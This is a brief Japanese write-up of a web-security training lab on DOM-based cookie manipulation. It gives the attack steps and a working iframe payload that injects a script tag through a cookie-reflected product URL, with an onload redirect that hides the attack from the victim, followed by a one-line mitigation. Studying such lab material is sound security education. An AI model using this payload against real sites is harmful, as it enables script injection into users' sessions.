【28個目】【DOM XSS】 DOM-based cookie manipulation

DOM-based cookie manipulation

概要

cookieの値でリンクを作成している脆弱性を利用してスクリプトを実行させる

攻撃手順

• cookieの値がリンクに使用されていることを確認
• エクスプロイトサーバに以下を設定
  • 以下によって、iframeタグが閉じられた後、スクリプトタグがDOMに挿入されて実行される。onloadは被害者に攻撃を気づかれにくくするためにホーム画面へ遷移させるための処理
  • <iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">

対策

• エスケープ処理を行う

クリアするまでにかかった時間

• 40m